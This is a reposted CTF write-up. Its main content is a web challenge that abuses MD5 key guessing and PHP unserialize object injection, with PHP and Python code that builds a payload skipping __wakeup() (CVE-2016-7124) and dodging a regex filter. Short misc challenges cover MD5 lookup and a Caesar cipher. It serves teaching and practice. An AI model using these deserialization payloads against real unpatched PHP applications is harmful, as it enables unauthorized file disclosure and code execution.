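The salt is why a plain RC4 decrypt with welcometoicqedu as the key produces garbage: the effective key is the 20-byte SHA-1 digest, different for every salt.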

Challenge: hash  Type: web

The link opens http://8bd793f83e9343418fb9b39a8cd7f3ee1f22184a90af438a.ctf.game/index.php?key=123&hash=f9109d5f83921a551cf859f853afe7bb

Looking up f9109d5f83921a551cf859f853afe7bb in an MD5 database gives kkkkkk01123.

Since key=123, the key is presumably the last three characters of the hashed string, and the page says anything other than 123 will do. Append admin instead and MD5 the result: md5 of kkkkkk01admin is 049f601185c0846faac45065a834b1c5

Visit http://8bd793f83e9343418fb9b39a8cd7f3ee1f22184a90af438a.ctf.game/index.php?key=admin&hash=049f601185c0846faac45065a834b1c5

This reveals Gu3ss_m3_h2h2.php:

<?php
class Demo {
    private $file = 'Gu3ss_m3_h2h2.php';
    public function __construct($file) {
        $this->file = $file;
    }
    function __destruct() {
        echo @highlight_file($this->file, true);
    }
    function __wakeup() {
        if ($this->file != 'Gu3ss_m3_h2h2.php') {
            //the secret is in the f15g_1s_here.php
            $this->file = 'Gu3ss_m3_h2h2.php';
        }
    }
}
if (isset($_GET['var'])) {
    $var = base64_decode($_GET['var']);
    if (preg_match('/[oc]:\d+:/i', $var)) {
        die('stop hacking!');
    } else {
        @unserialize($var);
    }
} else {
    highlight_file("Gu3ss_m3_h2h2.php");
}
?>

The script takes a var parameter, base64-decodes it and, unless it matches /[oc]:\d+:/i, passes it to unserialize(). The problem is that __wakeup() runs during unserialize and resets $file to Gu3ss_m3_h2h2.php before __destruct() gets to highlight it.

The trick: if the serialized string declares more properties than the object really has, PHP skips __wakeup() (CVE-2016-7124, fixed in PHP 5.6.25 and 7.0.10). For the regex, write the class header as O:+4: instead of O:4:; unserialize() accepts the leading +, while the pattern needs a digit right after the colon.

Reference: http://0x48.pw/2016/09/13/0x22/

A few extra lines on top of the challenge's class produce the payload:

<?php
class Demo {
    private $file = 'Gu3ss_m3_h2h2.php';
    public function __construct($file) {
        $this->file = $file;
    }
    function __destruct() {
        echo @highlight_file($this->file, true);
    }
    function __wakeup() {
        if ($this->file != 'Gu3ss_m3_h2h2.php') {
            //the secret is in the f15g_1s_here.php
            $this->file = 'Gu3ss_m3_h2h2.php';
        }
    }
}
$a = new Demo('f15g_1s_here.php');
$a = serialize($a);
echo $a;
echo '<br />';
$b = str_replace('O:4', 'O:+4',$a);   // dodge /[oc]:\d+:/i
$b = str_replace(':1:', ':5:' ,$b);   // declare 5 properties instead of 1 to skip __wakeup()
echo '<br />';
echo base64_encode($b);

This yields TzorNDoiRGVtbyI6NTp7czoxMDoiAERlbW8AZmlsZSI7czoxNjoiZjE1Z18xc19oZXJlLnBocCI7fQ==
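The same payload generated in Python 3, as an added example (not the write-up's own code), so both tricks are visible byte by byte: a private property serializes with a NUL-mangled name "\0Demo\0file", the declared member count is bumped to 5 to skip __wakeup(), and O:4: becomes O:+4: to slip past the regex. Function names are mine.

```python
import base64
import re

WAF = re.compile(r'[oc]:\d+:', re.I)          # the filter from Gu3ss_m3_h2h2.php


def waf_blocks(serialized: str) -> bool:
    return WAF.search(serialized) is not None


def php_serialize_private_object(class_name, props, declared_count=None):
    # PHP serialize() of an object whose properties are private: each member name is mangled
    # as "\0Class\0name" and its length counts the two NUL bytes. declared_count lets the
    # caller lie about how many members follow (the __wakeup() bypass).
    body = ''
    for name, value in props.items():
        mangled = '\0%s\0%s' % (class_name, name)
        body += 's:%d:"%s";s:%d:"%s";' % (len(mangled), mangled, len(value), value)
    count = len(props) if declared_count is None else declared_count
    return 'O:%d:"%s":%d:{%s}' % (len(class_name), class_name, count, body)


def build_var(path):
    honest = php_serialize_private_object('Demo', {'file': path})
    # 1) property-count mismatch: unserialize() builds the object but skips __wakeup()
    #    (CVE-2016-7124, fixed in PHP 5.6.25 / 7.0.10), so __destruct() sees our $file
    payload = php_serialize_private_object('Demo', {'file': path}, declared_count=5)
    # 2) 'O:+4:' is still accepted by unserialize() but no longer matches [oc]:\d+:
    payload = payload.replace('O:4:', 'O:+4:', 1)
    return honest, payload, base64.b64encode(payload.encode()).decode()


if __name__ == '__main__':
    honest, payload, var = build_var('f15g_1s_here.php')
    print('honest  :', repr(honest), 'blocked' if waf_blocks(honest) else 'passes')
    print('payload :', repr(payload), 'blocked' if waf_blocks(payload) else 'passes')
    print('?var=' + var)
```

The count mismatch only skips __wakeup() on unpatched PHP; on 5.6.25+/7.0.10+ unserialize() returns false for the malformed string and __destruct() never sees the changed $file.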

Pass it as var and the source of f15g_1s_here.php is highlighted. That page again takes a var parameter, also behind a WAF; a one-line shell that executes code sent via POST gets the flag.

Challenge: 泄露的数据 (leaked data)  Type: misc

Ciphertext: 25d55ad283aa400af464c76d713c07ad. The title suggests MD5 and the 32-character length confirms it; http://www.dmd5.com/md5-decrypter.jsp returns the plaintext 12345678 instantly. Add the flag format.

Challenge: 考眼力 (test your eyesight)  Type: misc

Ciphertext: gmbh{4d850d5c3c2756f67b91cbe8f046eebd}. The format gives it away (gmbh is flag with every letter shifted by one), so it is a Caesar cipher; Python script:

# Caesar Cipher
MAX_KEY_SIZE = 26

def getMode():
    while True:
        print('Do you wish to encrypt or decrypt a message?')
        mode = raw_input().lower()
        if mode in 'encrypt e decrypt d'.split():
            return mode
        else:
            print('Enter either "encrypt" or "e" or "decrypt" or "d".')

def getMessage():
    print('Enter your message:')
    return raw_input()

def getKey():
    key = 0
    while True:
        print('Enter the key number (1-%s)' % (MAX_KEY_SIZE))
        key = int(input())
        if (key >= 1 and key <= MAX_KEY_SIZE):
            return key

def getTranslatedMessage(mode, message, key):
    if mode[0] == 'd':
        key = -key
    translated = ''
    for symbol in message:
        if symbol.isalpha():
            num = ord(symbol)
            num += key
            if symbol.isupper():
                if num > ord('Z'):
                    num -= 26
                elif num < ord('A'):
                    num += 26
            elif symbol.islower():
                if num > ord('z'):
                    num -= 26
                elif num < ord('a'):
                    num += 26
            translated += chr(num)
        else:
            translated += symbol
    return translated

mode = getMode()
message = getMessage()
if mode[0] != 'd':
    key = getKey()
print('Your translated text is:')
if mode[0] != 'd':
    print(getTranslatedMessage(mode, message, key))
else:
    for key in range(1,MAX_KEY_SIZE + 1):
        print(key,getTranslatedMessage('decrypt',message,key))

It prints all 26 shifts, but the very first one (key 1) is the flag: flag{4c850c5b3b2756e67a91bad8e046ddac}

Challenge: flag格式 (flag format)  Type: misc

No idea what the point is; just copy it: flag{0ahief9124jfjir}

Reposted from: https://www.cnblogs.com/kurokoleung/p/6363845.html
